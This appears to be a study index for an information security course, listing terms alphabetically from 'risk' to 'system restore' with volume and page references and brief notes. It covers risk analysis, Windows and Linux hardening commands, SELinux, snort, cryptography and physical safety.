risk                                            3   265   you have to link the vulnerability and threat before talking about risk
risk analysis matrix                            3   261   the x-axis is severity of consequences, the y-axis is probability of likelihood
risk analysis matrix                            3   275   provides the best way to focus on the real threat by focusing on the threat vectors in the matrix.
risk analysis purpose                           3   275   1- Identify existing countermeasures, threats and vulnerabilities. 2- Support expenditure (price) of resources and cost-effective safeguards. 3- Aid in selection of cost-effective countermeasures to reduce risk to an acceptable level
risk assessment (knowledge vs best practice)    3   267   for technical people it's easier. According to the standard or best practice, you could avoid risk after deploying a standard like an ISO standard.
risk Evaluation                                 3   282   risk management step 4, calculate ALE
risk forms                                      3   264   information security risk is one form of multiple risks
Risk internal attacks                           3   277   use HIPS, Windows event log, TCP Wrappers, honeypots, Unix xinetd.
Risk malicious code                             3   279   virus scanning, HIDS (Tripwire, Unix & Windows), egress filtering catches worms
Risk manage step1, threat Assess & Analysis     3   275   identify type of threat, look for evidence; two outsider attacks, two insider attacks, malicious code
Risk manage step2, Identification & Valuation   3   280   asset identification and valuation
Risk manage step3, Vulnerability Analysis       3   281   vulnerability analysis
risk management                                 3   256   the art of analyzing threats and vulnerabilities and determining the impact on the enterprise
risk management cycle                           3    23   consists of three parts: prevention, detection, response
risk management focus                           3   256   to reduce the risk until it is at an acceptable level
risk management goal                            3   258   identify, measure, control and minimize the likelihood of attack
risk management questions                       3   266   to decide between accepting, mitigating or transferring the risk, they are: what could happen? how bad? how often could it happen? how reliable (degree of uncertainty)?
risk management step 4- risk evaluation         3   282   risk evaluation
risk management step 5- interim report          3   283   interim report
risk management steps                           3   262   set security infrastructure,design controls for each tech,……..
risk management emphasis               3   263   focus on the process, not just a series of actions
Risk outsider attacks - internet       3   276   use newspapers, hacking web sites, firewall & IPS logs, scan the network with SNMP to look for other routes & backdoors, try to connect to your wireless from the parking lot
risk uncertainty                       3   267   risk requires uncertainty, with probability from 0 to 1; people always express it as a percent
rlogin                                 3    11   port 513 TCP, rlogin command, allows communicating with a remote machine
rlogin -l root                         3    16   -l username, starts the terminal session on a host
rm <file_name>                         6   220   delete files or a directory
rmdir <dir_name>                       6   219   remove a directory, only if empty
robocopy.exe                           5    73   built in to 2008/Vista/Seven and can be installed on XP/2003
robocopy.exe                           5    73   copies large files in long folder paths, copies EFS files, can mirror folders, can't copy locked files == backup utility to back up selected files in Vista ==
robocopy.exe command                   5    73   options
robots.txt                             4   261   you can see in it unlinked pages marked not to be searched.
RODC (Read Only Domain Controller)     5    15   can use BitLocker with a TPM chip and is likely installed with the Server Core option
RODC credentials                       5    33   a list of cached credentials is tracked, so if compromised the users are forced to change passwords
ROI                                    3    97   ROI = (gain - expenditure) / (expenditure) * 100%
ROI                                    3    97   for evaluating whether or not to go ahead with the purchase, for predicting revenue
ROI (Return on investment)             3    97   the financial benefit or return received from a given amount of money or capital invested into a business
ROI(return on investment)              4   147   huge ROI of wireless in the hospital (healthcare) industry.
role                                   6   202   set of permissions granted to a user, ends with _r
roles & features add/remove            5   200
roles in SCW                           5   196   you can select the roles you want & SCW will perform many security reconfiguration tasks for you
roles in server manager                5   199
rollback                               5   196   you can roll back the last set of changes
roll-up                                     57   fix many issues at once
rootkitrevealer                        5   284   helps to detect rootkits, Sysinternals
rootkits                               3    41   subvert kernel, process management, file access, security and memory management functions
rootkits                               3    41   cracker tool that is inserted stealthily into the local OS and subverts it
rootkits linux                         3    41   loadable kernel modules; under Unix they are called device driver files
rootkits windows                       3    41   using the Microsoft development kit for Win2003 Server
ROSI (Return on Security investment)   3    97   like the ROI, specific to security
ROT-13                                 4    19
rotation of duties                     4   240   regularly rotate positions to alleviate collusion between employees
Rotation Substitution                  4    19   uses one-to-one substitution of characters; rotate the alphabet by X characters.
route -n                               6   197   lists the networks with a live route
route.exe                              5   283   show routing table
Routing and Remote Access Service      5    15   RRAS, supports both IPsec and SSL VPNs
Routing and Remote Access service      5   230   multiprotocol router, can do NAT, load balancing, fault tolerant, NLB driver built in
routing loops                        1     53      TTL guards against routing loops
Routing workload                     2     88      have two sites to test patches; if it works well in one, make it primary and the other backup, which will test another patch
RPC (remote Procedure Call)          6   102,103   client-server based, and it is set up so that the client calls functions in the server program
rpc calls padded                     3     199     32-bit words, always carry a lot of zeros
RPC/DCOM                             5      7      in XP SP2 anonymous RPC over the network is not permitted
rpcinfo                              3     10      get a list of all RPC services and details about them on a remote host
rpcinfo -p                           3     199     list the available RPC ports on a remote host
RPCSec                               6     102     is the secure version of RPC
rpm                                  6     163     package manager solution for RedHat Linux
rpm --rebuilddb                      6     164     update/rebuild the rpm header db
rpm -F pkg                           6     163     freshen pkg (update installed packages)
rpm -i pkg                           6     163     install package
rpm --initdb                         6     164     create a new rpm header db
rpm -q pkg                           6     164     query to see if pkg is installed, or error if pkg isn't installed
rpm -U pkg                           6     163     upgrade pkg (if pkg is not installed, install it)
RRAS                                 5      15     routing and remote access service
RRAS                                 5     230     routing and remote access service, stateful firewall built in to Windows Server but not enabled; manage with the RRAS snap-in or with NETSH.exe
RSA                                  4     67      most common asymmetric key encryption; it can be used to support both encryption and digital signature; it's a central part of Secure Socket Layer (SSL)
RSA                                  4     67      the security of the cryptosystem comes from the secrecy and size of the private key
RSA vs. DES                          4     68      DES is 100 times faster than RSA.
RSA vulnerability                    4     67      RSA vulnerabilities come from: 1- poor RSA implementation, 2- using a small key length
RSAT                                 5     270     Vista and later, allows an administrator to sit at a workstation and manage Active Directory
RSH                                  6     105     RPC service that allows a user to get a remote shell
rsh protocol                         3     15      port 514 TCP, non-interactive commands on a remote host using the rsh command
RTP Replay attack                    4     228     attacker records a specific telephone conversation, then broadcasts the content to a large number of VoIP users.
RTP Sniffing                         4     228     with tools like Wireshark
RTP stream manipulation              4     228     man-in-the-middle attack
run condition (level) dir            6     89      /etc/rcX.d; normally there's one directory for each run condition, files start with S or K
run levels                           6    86,87    init selects which set of scripts to run based on the run level; the run level is defined in the /etc/inittab file; each Unix system has its own run levels
runas.exe                            5     176     can launch programs under different privileges; program in Vista to run programs with other privileges
S/Key                                2     142     pre-computed list of passwords when the system is first configured; when the user logs in they use a different S/Key
S/MIME - Secure E-mail               4     129     another use of PKI is to encrypt or digitally sign e-mail messages; built in to many mail clients, Outlook, BlackBerries
SACL (System Access Control List )   5     111     provides auditing capabilities
SACL (System Access Control List)       5   321   different for different objects, can be inherited
Sadmind/IIS worm                        2    40   infects Solaris & MS; buffer overflow attack on a vuln in the sadmind program
SAFER+ cipher by Cylink                 4   152   is the Bluetooth algorithm used for encryption and authentication, & was a submission candidate for the AES algorithm, 128-bit key
safety plan consideration               1   222   should consider: smoke and fire, natural gas explosion, toxins, poor air quality, structural failure
safety walkthrough                      1   245   exit doors must be clear, doors function properly, alarms fully functional, people know what to do
safety warden                           1   220   responsible for the evacuation team, last one to leave
SAM                                     2   131   Security Account Manager
samba                                   6    99   software run on Unix/Linux that allows the host to interact with a Windows client or server as if it were a Windows file and print server; this interaction is like connecting or disconnecting directory mappings and printer sharing on Microsoft systems, using the SMB protocol [Unix implementation of SMB]
Sandbox                                 2   238   run the browser in restricted mode, limit its ability to interact with other data on the PC, ex. applet
Sasser Worm                             2    31   W32, infected systems and their backups, systems run slowly and shut down
SAT (Security Access Token)             5    35   never sent over the network; important parts are sent on the network by the authentication protocol
SAT (Security Access Token )            5   116   contains integrity SID for MIC label, list of all user rights
SAT (Security Access Token)             5    28   your identity & rights; each program has a copy of the SAT; whoami.EXE /all /fo list ---------> Win 7
SAT (Selective Access Control)          5    86   allows regulation of access to resources (files, folders, printers, registry keys) == consists of (SID of user domain AC + SID of domain group)
satan                                   3   117   first vulnerability scanner
SB1386                                  2   178
S-box substitution                      4    65
SBU (sensitive but unclassified)        2   104   sensitive data that shouldn't be released, like social security numbers
sc.exe                                  5   194   configures each aspect of every service or device driver on a local or remote machine
sc.exe \\pc qc service_regkey           5   194   query the configuration information about the service specified by registry key
sc.exe \\pc query                       5   194   query the list of services from a remote PC
sc.exe \\pc queryex service_regKey      5   194   shows more detailed extended information about the service specified by registry key
sc.exe \\pc service_regKey start=disa   5   194   start=disabled, to permanently disable the service specified by registry key
sc.exe \\pc service_regKey stop         5   194   to stop the service specified by the registry key from getkeyname
SC.EXE better than NET.EXE              5   194
sc.exe config netbt start=disabled      5   206   disable the NetBIOS service
sc.exe config netbt start=system        5   206   system default case for NetBIOS
sc.exe getkeyname Service_name          5   194   getkeyname to get the registry key for the service
sc.exe qc netbt                         5   206   query the configuration information about the NetBIOS service
SCA database                            5   150
sca snap in                             5   150   used to configure the computer to match a security template in one easy step, no undo == is used to import a template & apply it to the PC == SCA limitation --> only on the local machine, not across the network
SCA snap in                             5   298
scanline                                5   284   command line port scanner, when WinPcap has problems, Foundstone
scheduling jobs                         5   294   task scheduler, LSA Secrets portion of the registry
schema                                           5    39   defines all types of objects and their attributes in the directory
Schnorr signature scheme                         4    54   an algorithm that uses the intractable problem of discrete logarithms for finite fields
schtasks.exe                                     5    55   XP and later, schedule commands to run at a specific time or periodically, executes batch
SCHTASKS.exe                                     5   294   by schedule
scoring tools                                    6   187   program that rates your system on how secure it is (the number doesn't have a direct meaning but it does allow a relative comparison between systems), free tool
screened network traditional                     3    54   design a network into trusted and untrusted zones, DMZ, risk of being compromised
screening & selection of employees - OPSEC       4   239   investigate your employees before hiring them, look at their history, make sure that your HR is doing its work
scripts using GPO                                5   292   startup/shutdown run in the computer context, logon/logoff run in the user context
SCW (Security Configuration Wizard )             5   196   built-in knowledge about the services, ports and network components needed for roles or functions
SCW (Security Configuration Wizard )"scw.exe."   5   196   Server 2003 SP1; can't be installed in Vista/Seven; works in Server 2008
scw xml policy file                              5   197   can be used to configure a server or to analyze compliance with this policy
scwcmd.exe                                       5   197   cmd tool for the SCW GUI, scriptable version
scwcmd.exe analyze /?                            5   198   to see the analysis and report options of the tool; /m:machineName, /p:path&policyFile, /o:output
scwcmd.exe configure /?                          5   198   can configure a list of computers but you can't roll back a list; to configure an OU
scwcmd.exe configure /p:file.xml                 5   197   file.xml is the policy file with which the server will be configured, for services run, disable, stop
scwcmd.exe transform /p:policyfile g             5   198   /p:file.xml /g:grouppolicy file; can take an XML policy file and convert it to a GPO
scwcmd.exe view /x:report.xml                    5   198   view the report from SCW using a nice GUI
SDHC slot                                        5    17   slot in mobiles, multi-gigabyte memory, at least 8 GB
searcher                                         1   220   checks each place for employees, puts signs that no one is there
search-textlog.ps1                               5   248   script takes 2 arguments: IIS log file, text for regular attack patterns; and searches for those
Secedit.exe                                      5   152   cmd tool for security configuration and analysis (SCA)
secedit.exe                                      5   299   cmd for SCA, steps
SECEDIT.exe or SCA                               5   193   disable all the undesired services in one shot
secedit.exe /configure/db a:\db.dbs              5   152   configure the computer using the database from floppy
Secure coding                                    2   242   validate user input, initialize variables, don't make the app require admin privileges, don't display errors
secure connection                                5   216   mutual authentication and packet signing
Secure E-mail(S/MIME)                            4   129   another use of PKI is to encrypt or digitally sign e-mail messages; built in to many mail clients, Outlook, BlackBerries
secure host                                      5   190   a hardened machine, against vulnerabilities not discovered yet
Security Configuration and Analysis              5   193   to disable services
Security by Obscurity is no Security             4     8   proprietary algorithms are high-risk, because they're not available for public scientists to check the cipher
security configuration and analysis              5   150   SCA, can save a database file .sdb, can't apply through the network
security configuration wizard function           5   197   enable/disable services, configure firewall rules, IPsec policies
security enhanced applications - Linux           6   200   SELinux and AppArmor
security information event management            3   204   a security information event management station, combines multiple sources into one machine
security lights                                  1   243   detective control
security options in linux                        6   199   boot loader password, ps, netstat
Security policy                               2    52   What to do
Security policy - Why ?                       2    52   protect info,people,org,
Security posture(‫)الوضعيه‬                     2    56   look into mirror,what security looklike now
security template                             5   145   AscII file contain configuartion of security settings,snap in
security template enterprise client           5   147   EC,for computers joined to active directory 2003 or later
security template files                       5   146   .inf file stored by default in /systemroot/security/templates
security template store                       5   145   password policies,account lockout policies,kerberos policies,audit policies == ASCII files contans security setting
Seeion Attack Protection                      2   255   make it random or long ,digitally sign or hash it ,provid session id new at authen,make expire time
Seizure                                       2   179
Seizure with warrant                          2   179
self digonastic procedure                     1    14   in token ring system identified itself having a problem will pull him self from the ring to check itsef
self-synchronizing stream cipher (auto-key)   4   24
SELinux                                          6   200   Security Enhanced Linux; enhances the default DAC security of the Unix system with the inclusion and management of a MAC security effort
SELinux                                          6   201   a Linux security enhancement feature; uses security-based policies, based on U.S. Department of Defense style MAC; uses Linux Security Modules (LSM) in the Linux kernel
SELinux - MLS/MCS                                6   205   each level is a sensitivity-category pair with the category being optional; when a category is used the level is written as sensitivity:category-set (s0:c0.c1023 --> from c0 to c1023); if no category is used the level is written as sensitivity only
SELinux - security policy                        6   203   targeted --> focuses on particular apps and processes; unless identified, the rest of the processes run unrestricted. strict --> manages all processes and each must be managed individually
SELinux - type or domain                         6   202   assigned to processes so that types of similar function can be given similar permissions to an application or the system; ends with _t and is used when referring to an object
Selinux DAC                                      6   204   this allows the sysadmin and all users to manage the security of files they own or manage
selinux DAC allow                                6   204   SELinux access policy is applied
selinux DAC deny                                 6   204   SELinux access will not be applied to the object
selinux DAC flaw                                 6   204   any exploit that allows access to the system as any potential user may be able to elevate that user or the processes they own and defeat or circumvent security
SELinux parts                                    6   202   context of users in relation to an object or subject (file and/or dir); context --> file or dir and has 3 parts: user account, role, type or domain
SELinux uses DAC                                 6   201   DAC allows users full security access over their installed and owned applications, leading to security risks to the system
SELinux uses MAC                                 6   201   to give admins the ability to control all interactions of software on the system; the security model is based on least privilege and starts with users having no rights
separation of duties - OPSEC                     4   240   try to look for ways to reallocate tasks across multiple positions.
Server Core                                      5    14   Server 2008; doesn't include start menu, taskbar, control panel or Internet Explorer
server core option / installation                5   200   no standard graphical shell
Server Hardening                                 2   220   patching, close (ports, applications, default user accounts), strong passwords, etc.
server manager                                   5   199   Server 2008 and later; organizes server capabilities into roles and features, helps with dependencies
Server side Programming                          2   236   can be run on the web server, the app server, and as stored procedures on the database server
servermanagercmd.exe                             5   200   command-line tool for server manager, scripting enabled
servermanagercmd.exe -query                      5   235   to see which roles or features are installed right now
SERVERMANAGERCMD.EXE tool                        5   235   install/uninstall roles & features
service command                                  6    93   service <servicename> [start|stop|restart]; service --status-all --> get the status of all services.
service dependencies                             5   194   from the dependencies tab you can know which services depend on which
service disabling                                5   193   administrative tools, security template .inf, GPO, sc.exe
service management                               6   91,92 if you don't need a service turn it off; update and patch all services, running or not, to: 1- prevent local exploits by unprivileged users, 2- have them patched in case they are re-enabled
service name - Linux                             6   107   all services are defined in /etc/services
Service Pack                                     5    52   a collection of updates and hotfixes rolled up in one large installation package; service pack - a giant patch with some hotfixes & updates together; service pack - is between 100 and 300 MB
service pack batch installation                  5    55   batch file, then run it remotely or from psexec.exe or schtasks.exe or exec.vbs
Service Pack Problem discovery                   5    52   lab test + deploy in limited groups (staging) == do staged roll-outs & check for problems == service pack - test it in the lab first because it may break applications or cause network problems (test with VMware)
service pack staged deployment                   5    53   a few boxes at a time; start with the least important, end with the most critical
service started how?                             6    73   1- at boot time, 2- automatically by init or rc scripts which use inetd/xinetd (on-demand services), 3- cron scheduler (crontab), 4- command line
services startup settings                        5   193   disable service
Session cookie                                   2   232   stored only in memory; when the browser exits it is lost forever
session hacking                                  2   253   session ID in URL -> attacker can edit it; hidden field or cookie -> can use a proxy or Firefox plugin
session id                                       2   252   in cookie or URL query
session layer                                    1    44   handles the establishment and maintenance of connections
session toolkit                                  2   255   tools like WebScarab
session tracking                                 2   252   use a session ID in a cookie or URL query
set in cmd.exe                                   5   289   to see your environment variables
setenforce                                       6   203
setgid                                           6    39   same as setuid but programs run with the group's permissions
setgid for dir                                   6    38   when a new file is created in the directory it inherits the group of the directory --> perm rwxrwsr-x
setuid                                           6    38   programs run with the owner's permissions; used with executable files --> perm rwsr-xr-x
Server Core                                      5   234   is an installation option
Server 2008 R2                                   5   234   includes handling of the ASP.NET framework & XML configuration files
SGI machine                                      6   141   IRIX Unix
SHA - Secure hash algorithm                      4    32   Secure Hash Standard (SHS), 160-bit value
sha256deep.exe                                   5   310   compute SHA-256 message digests
shadow file fields                               6    53   username, passwd, last, may, must, warn, expire, disable, reserved
Shadow passwords                                 2   141   /etc/shadow rather than /etc/passwd
shallow inspection                               3   181   header only, very fast
share permissions                                5   101   no inheritance; multiple share names with different permissions
share permissions                                5   102   are enforced when access is done through SMB
share permissions                                5   103   full control, change, read; no inheritance in share permissions
share permissions 2003 / later                   5   103   default permission is read for the Everyone group
share permissions xp                             5   103   default is full control for Everyone and this default can't be changed from the registry
shared folder access                             5   101   network places, mapped drives, start menu run, shortcuts
shell                                            6    25   the portion of the OS with which users and processes interact directly (it is the command line interpreter & provides the user with an interface to the system)
shell                                            6    30   listens to the terminal, then translates requests into actions by the kernel and programs
shell examples                                   6    31
short-term solutions                             3   286   short amount of time for little or no cost
showmount                                        3     9   list file systems on a remote host, NFS file systems
SID (security ID)                                5    26   for each user or group, unique
SID security id well known                       5    26   S-1-1-0 Everyone group, S-1-5-11 Authenticated Users group, S-1-5-32-544 local Administrators group
siem                                             3   204   a security information and event management station combines multiple sources into one machine
SIG - Bluetooth Special Interest Group           4   151
Signature & certificate revocation               4   133   at PKI
signature analysis                               3   175   checksum of file, string search, protocol, address, port, payload contents, flags, traffic flow analysis
Simple file sharing network access               5   174   with simple sharing disabled, users authenticate as themselves; Classic - local users authenticate as themselves
single crack mode                                2   126   uses the user name and GECOS info, adds previously guessed passwords; faster than wordlist mode
SKEME                                            4    97   Secure Key Exchange Mechanism; extends the capabilities of Oakley.
Skype                                            4   222   proprietary VoIP; clients relay traffic for each other (P2P)
SLA (service level agreement)                    2   244   defines how to maintain the security of a hosted app
SLE (single loss expectancy)                     3   268   the loss from a single event; if you had been exploited, what it would cost you
SLE (single loss expectancy)                     3   269   Asset value * Exposure factor; if conference room = $100,000 and a terrorist attack causes 50% loss --> SLE = $50,000
slipstreaming                                    5    54   update the Windows source so that when installing it the SP comes in one shot
SMART                                            2    70   Specific, Measurable, Achievable, Realistic, Time-based
smart card EFS                                   5    12   the storage of your EFS decryption key on the same card you log on with
smart cards                                      1   241   electronic badges that include a magnetic strip or chip that can record and replay a set key
smart cards rekeying                             1   241   rekeying is inexpensive because it requires only removing the current acceptable code from the lock
SmartDefense                                     3   251   helps against worms, trojans; integrated into VPN-1
SmartScreen filter                               5   187   checks for phishing and malware web sites; checks via Microsoft database; automatic, manual
SMB (server message block)                       5   101   allows sharing of resources: files, printers
smoke and fire                                   1   223   detective controls: smoke detectors, heat sensors; suppressive controls: sprinklers, fire extinguishers
smurf attack                                     3    29   spoofs a victim's IP and sends echo requests - broadcast - to a network
snapshot content                                 5   308   user accounts, group membership, shared folders, user rights, processes, network configuration
snapshot.bat script                              5   310   output is 15~30 MB, 5 to 15 min to run
snapshot.bat script                              5   310   ******4 pages********
sniffer                                          1   134   it's important to use promiscuous mode to see all traffic
sniffer tools                                    6   190   if packets are not flowing correctly or there are network problems to diagnose
sniffers                                         6   190   copy packets from the network cable (need to be run as root), display a summary of important headers & save them to disk for later reprocessing
sniffers examples                                1   136   rootkit sniffers seek the usernames and passwords in the network
sniffing -- switch                               1   137
snort                                            6   195   started as a testing tool for honey pot systems software; intrusion detection system (runs on anything); it's a powerful sniffer application; free and commercial versions; strong supplied ruleset; users can add their own rules
snort - Key points                               3   204
snort - to see its output                        6   196   to actually elicit some alerts, we tell nmap to probe for open services on a remote machine in a different terminal window; the port scan will show up in the snort console
snort -vd -l /root/log -c /etc/snort.conf -i lo  6   198   snort as a full IDS; this configuration file tells snort which attacks to look for
snort as a packet logger                         6   198   1- make the log dir, 2- snort -vd -l /root/log -i lo; a summary of the packets is kept in the directory tree under one of the IP addresses in the packets
snort as IDS                                     6   198   snort -vd -l /root/log -c /etc/snort.conf -i lo
snort as NIDS                                    3   198
snort as sniffer                                 6   198   shows packets on the screen; run it as snort -vd -i lo
snort -d                                         6   196   print the application layer as well as the default header
snort diff between linux & windows               6   197   snort does the same job on these platforms since it is compiled from the same source code, but on Linux performance will be better; Windows systems start to drop packets as the number of packets and attacks per second goes up
snort -e                                         6   196   show the Ethernet MAC address or link address for your cable type
snort -h                                         6   198   snort -h "home net": tells snort which address is local; the other is used as the packet directory
snort -i {interface}                             6   196   tells snort to sniff on that interface
snort operating modes                            6   198   snort as sniffer, snort as packet logger, snort as IDS
snort rule flexibility                           3   200   the snort user community develops new rules to detect the latest exploit, virus, worm or other attack technique
snort rules                                      3   201   basic (pass - log - alert), advanced (activate - dynamic)
snort rules - Advanced                           3   203
snort rules - simple                             3   202
snort uses                                       6   196   run in the foreground as an IDS
snort -v                                         6   196   snort in verbose mode; it prints a multi-line summary of each attack
snort -vd -i lo                                  6   198   snort as sniffer
snort -vd -l /root/log -i lo                     6   198   snort as packet logger
snow + options (injection Stego)                 4   40-41 is a command line program and tool for injection
sobig worm                                       3   118   most prolific e-mail mass mailer, Aug 2003
social engineering                               3   107   describes an attempt to manipulate a person into providing information or access to information
social engineering                               3   108   human based: urgency, third-person authorization; computer based: pop-up windows, mail attachments
social engineering defense                       3   109   policy, procedures for granting access, educate users to report any malicious activity
Software key store                               4   121   smart card
software update service SUS                      5    61   old version of WSUS
solaris pkg manager                              6   167   pkgadd, pkgrm, pkgchk
somarsoft                                        5   284   DumpSec, DumpEvt, DumpReg
someplace you are                                2   106   GPS
something you are                                2   106   biometrics
something you have                               2   106   token
something you know                               2   106   password
SoulSeek                                         2    41   peer-to-peer application
sourcefire                                       6   186   provides commercial support for ClamAV and sells the snort app and support
SOX()                                            2   178   accounting
special needs assistance                         1   220   responsible for keeping a list of all who need assistance
specialized security limited function            5   147   SSLF, maximum security template; sacrifices backward compatibility; peak performance
specialized sniffer                              6   190   capture passwords, look for attacks; all of them in some form can listen to raw packets flying by on a network cable and show them or analyze them
SPID (service profile identifier)                1    18   establishes a connection between ISDN sites
Split operation Model                            2    88   have two sites to cover one another in case of disaster
SQL Injection                                    2   262
SQL Injection defense                            2   264   validate user input, filter, length limit, access control, don't display SQL errors
SQL Security using MBSA                          5   303
sql server security tips                         5   249
SQL Slammer                                      2    30   DoS attack; uses UDP port 1434; exploits a buffer overflow vuln in MS SQL Server & MSDE
squid                                            6   175   is a Linux proxy application used for Web & FTP, & can coexist with iptables.
SRP (Software Restriction Policies)              5   177   define exactly which executables can and can't run in WinXP or later == who can or can't launch a process or software ==
SRP (Software Restriction Policies)              5   177,178 help to fight malware; which processes a user can run; MD5 - UNC - Zone; SRP exceptions allow or deny by 4 methods; Basic User, Unrestricted; create an exception to the default policy; Default deny policy, Default allow policy, Disallowed
SRP designated file types                        5   178   Global SRP; defines which file types the SRP policies apply to; can add new file types
SRP enforcement option                           5   178   Global SRP; to exclude admins and maybe DLLs from SRP policies
SRP exceptions                                   5   177   4 exceptions: hash of executable, issuer of digital certificate, UNC path of executable, zone
SRP global options                               5   178   enforcement options, designated file types, trusted publishers options
SRP trusted publishers options                   5   178   determine who decides to trust certificates, whether a CRL is required
SSL (Secure Socket Layer)                        4   125   is one use of PKI to encrypt messages between web server and web browser; done by SSL & TLS; client & server use PKI certificates (asymmetric) to negotiate a session key (symmetric)
SSL (secure socket layer)                        2   234   provides encryption, identity verification, data integrity; uses port 443
SSL handshake                                    4   128   SSL steps from client to server
SSL PKI crypto                                   4   128   SSL steps from client to server
SSL portal VPNs (Client - Site)                  4    99   Client - Site; accessible to more users than SSL tunnel VPNs (Site - Site)
SSL tunnel VPNs                                  4   99-100 quite different from IPsec tunnels, in that SSL tunnels are always created by non-standard tunneling methods while IPsec uses standard methods
SSL VPN                                          4    99   should open firewall ports 80 & 443
SSLF                                             5   147   specialized security limited functionality; template security level
SSO (Single Sign On)                             2   112   log on once per day; allows centralized management using LDAP, AD, Kerberos
SSTP (Secure Socket Tunneling Protocol)          5    15   SSTP encapsulates packets in HTTP, then encrypts using SSL
SSTP (secure socket tunneling protocol)          5   226   SSL/TLS VPN; requires Win2008 Server; no problems with NAT or firewalls; see book
staff_r                                          6   202   admins are assigned to that role and are allowed to change to and from the sysadm_r role
stairwell/door monitor                           1   220   direct employees to the stairs, make sure there is no dangerous material, hand a flashlight to employees
Standard - definition                            2    63   H/W and S/W related, more specific, mandatory
Standard or Generic permission - NTFS            5    90
Stand-alone IIS box                              5   234
standards based protocol                         1     7   like internet access over IP and the Bluetooth Network Encapsulation Protocol
star physical topology                           1     9   the only one that can prevent eavesdropping; fault tolerance, scalability, supports traffic isolation, confidentiality for traffic
star physical topology                           1     9   single point of failure; fault tolerance for cables only, not for faulty NICs
start-up scripts/run level scripts               6    84   run by init; init runs one or more start-up scripts (run level scripts), which actually start the programs and services that most users interact with
STAT                                             6    65   ps output; it is the current process status
STATD                                            6   105   RPC service run by client and server; this service handles the status of file locks
state flag                                       3    58   identifies the relationship between the source and destination address
stateful firewall                                3    58   tracks the progress of the connection; no inspection of data is performed
stateful inspection ftp                          3    60   a stateful firewall can track FTP, H.323, SIP connections
stateless firewall                               3    56   low end, very fast, can easily be bypassed; if ACK is set, existing connection
statistical sampling analysis                    3   192   a manageable subset of traffic is a desirable alternative to complete failure when there's too much traffic
Steganography                                    4    34   hiding the data in a carrier file (medium: jpg, .doc, .wav, etc.)
Steganography - carrier or host file             4    34   used to hold the hidden data: Word, BMP, JPEG, WAV, movies, HTML files
Steganography components                         4    38   host file (the medium used to hold the hidden data) and the carrier (image, Word doc, movie, sound, ...)
Steganography does not guarantee safety          4    35   the secrecy provided by stego is great, but data protection still relies on the encryption algorithm used; always try to encrypt data before using stego
Stego types                                      4    39   1- Injection, 2- Substitution, 3- generate new file
Stego - generate a new file                      4    43   hidden data is used to generate a new file; no host file is needed
Stego - injection                                4    40   we place the information into "holes", he meant unused areas of the file; the biggest problem of the injection type is that the size of the carrier increases.
Stego - substitution                             4    42   most popular method used, and the file size of the carrier remains the SAME, by replacing useless data in the host file. Like: least significant bits (LSB) in the color table of a graphic
sticky bit                                       6    38   delete only your files, not others' files --> dir perm rwxrwxrwt
Stimulus vs. response                            2   206   SYN --> stimulus, SYN/ACK --> response
                                                  operates on a single bit, highly dependent on the randomness of the keystream, keystream length must = plaintext
Stream Ciphers                          4   24
                                                  length, and have a vulnerability to Noise during transmission.
Stripping E-mail Attachment             2    44
structural assesment                    1   228   a detective control when taking old building
                                                  can happen from gradual sturtural weaking or sudden weaking,detective controls:structural assesment,sudden
structural failure                      1   228
                                                  imapct
structural gradual weaking              1   228   a result of a series of lesser events
structural sudden event                 1   228   may result from earthquacks,storms,explosions,sinkholes
Stunnel                                 2   273   is a generic proxy you can use to provide ssl capabilities ,can be used to hack SSL web sites
su <user>                               6   221   allow user to temperoary become another user
sudden structural failure               1   228   may result from earthquacks,storms,explosions,sinkholes
sudo                                    6   222
                                                  record the usage of su command, used by hackers to switch to usernames that have rlogin to other machines or su
sulog                                   6   128
                                                  to have root access, found in solaris and irix, /var/adm/sulog
superpolynomial                         4   51    an example of intractable problems, something between polynomial and exponential, more complex & hard.
support tools                           5   269   from windows installition cd cd:\support\tools\suptools.msi,win2000,2003
support tools list                      5   269   ********* 1 page**********
surveillance                            2   183   monitor network or conduct surveillance to gather info
SW testing                              2   240   run program in the intent of finding errors
swatch                                  6   152   log alert program
switch layer 3,7                        1    27
switched star netowrk                   1     9   best practise and the only one can prevent evesdropping
symantic ghost                          5    75   used to create binary disk images
Symmetric Encryption basic techniques   4    17   Basic techniques: Substitution, Permutation, Hybrid
Symmetric Key Cryptosystem              4    27   secret key encryption , Example, DES,3DES,AES,Blowfish,RC4,IDEA
Symmetric Key Cryptosystem              4    27   fast, require secure channel for key distribution, no technical non-repudation
syn flood                               3    29   filling a victim buffer with a lot of syn
synaptic                                6   166   synaptic/AWinApt GUI tools use apt to install,upgrade,remove pkg (debian)
synchronizing stream cipher             4    24   unpredictable to eavesdropper
SYN-RECV                                3    58   Second step in three way handshack,syn-ack received
SYN-SENT                                3    58   first step in three way handshack
sysadm_r                                6   202
sysinternals tools                          5   284     Process Explorer, Autoruns, PsExec, RootkitRevealer; purchased by Microsoft
SYSkey                                      2   130     MS protection mechanism, uses a 128-bit hash
syskey.exe                                  5   131     encrypts password hashes for accounts and private keys with a 128-bit RC4 key derived by passw
syskey.exe                                  5   132     best way to use it: password not stored locally
syslog                                      5   329     logs major events, such as su to root and failed login attempts; may need root level to view logs generated by syslogd; it's
syslog (messages)                           6   132     path /var/log/messages; Solaris --> /var/adm/messages, IRIX --> /var/adm/SYSLOG, HP-UX --> /usr/adm/syslog
syslog file fields (messages)               6   133     date time hostname originating_program_name : msg_sent_to_syslogd
syslogd                                     6   134,135 daemon that accepts incoming log msgs and deals with them according to the rules found in /etc/syslog.conf
syslogd                                     6   134     any program which wants to generate log messages may do so through calls to the syslog interface
syslog-NG - drawback                        6   154     complex to configure
syslog-NG - switch from syslog to it        6   153     chkconfig --del syslog, then chkconfig --add syslog-ng, then stop the syslog daemon and start the syslog-ng daemon
syslog-NG "next generation"                 6   153     syslog next generation, a replacement for syslog (can't reuse syslog.conf); additional filtering (filter by hostname and actual text of the log msg using regular expressions); sends data with TCP; can support Windows; not installed by default
syslog-NG config file                       6   153     /etc/syslog-ng; uses the same facility and priority as the default syslog daemon
syslog-NG filter                            6   153,154 create a destination (file), then create a filter based on facility, priority, hostname and presence or absence of a string, then create a log rule based on filters and destination
syslog-NG installation                      6   153     yum install syslog-ng installs it in Fedora
syslog-NG over tcp                          6   154     verify data so that the log is guaranteed to make it to the remote host; use encryption with stunnel
system boot                                 6    81     how a UNIX system boots: 1- bootloader, 2- kernel, 3- init, 4- startup scripts
system call interception                    3   232     HIPS software inserts its own process between application and OS resources
System center mobile device mana            5    17     centralized control over Windows Mobile
system log                                  5   318
system restore automatically                5    76     after installing the OS, every 24 hours, before updates, before new SW, before a new driver
